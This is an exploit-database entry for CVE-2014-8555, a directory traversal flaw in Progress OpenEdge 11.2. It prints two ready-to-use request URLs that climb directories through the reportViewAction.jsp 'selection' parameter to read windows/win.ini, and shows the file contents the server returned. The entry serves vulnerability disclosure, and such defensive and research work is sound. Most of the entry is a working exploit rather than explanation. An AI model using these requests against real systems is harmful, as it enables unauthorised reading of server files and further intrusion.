Progress OpenEdge 11.2 - Directory Traversal

🗓️ 31 Oct 2014 00:00:00Reported by XLabs SecurityType

Progress OpenEdge 11.2 Directory Traversal exploit on Windows O

Reporter	Title	Published	Views	Family All 7
0day.today	Progress OpenEdge 11.2 - Directory Traversal Vulnerability	10 Nov 201400:00	–	zdt
CVE	CVE-2014-8555	12 Nov 201416:00	–	cve
Cvelist	CVE-2014-8555	12 Nov 201416:00	–	cvelist
EUVD	EUVD-2014-8392	7 Oct 202500:30	–	euvd
NVD	CVE-2014-8555	12 Nov 201416:55	–	nvd
Packet Storm	Progress OpenEdge 11.2 Directory Traversal	11 Nov 201400:00	–	packetstorm
Prion	Directory traversal	12 Nov 201416:55	–	prion

# Exploit Title: Progress OpenEdge Directory Traversal
# Date: 30/10/2014
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.progress.com
# Software Link: www.progress.com/products/openedge
# Version: 11.2
# Tested on: Windows OS
# CVE : CVE-2014-8555

 

The malicious user sends a malformed request that generates the file access
up directories as follows: 

 

http://target_ip:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f.
.%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini 

 

or else 

 

http://
target_ip:9090/report/reportViewAction.jsp?selection=../../../../../../../..
/../../windows/win.ini 

 

 

And the application answers

 

; for 16-bit app support

[fonts]

[extensions]

[mci extensions]

[files]

[Mail]

MAPI=1

CMCDLLNAME32=mapi32.dll

CMC=1

MAPIX=1

MAPIXVER=1.0.0.1

OLEMessaging=1

 

 

More informations (in Br-Portuguese): https://www.xlabs.com.br/blog/?p=256

 

Thanks

31 Oct 2014 00:00Current

6.7Medium risk

Vulners AI Score6.7

CVSS 25

EPSS0.03515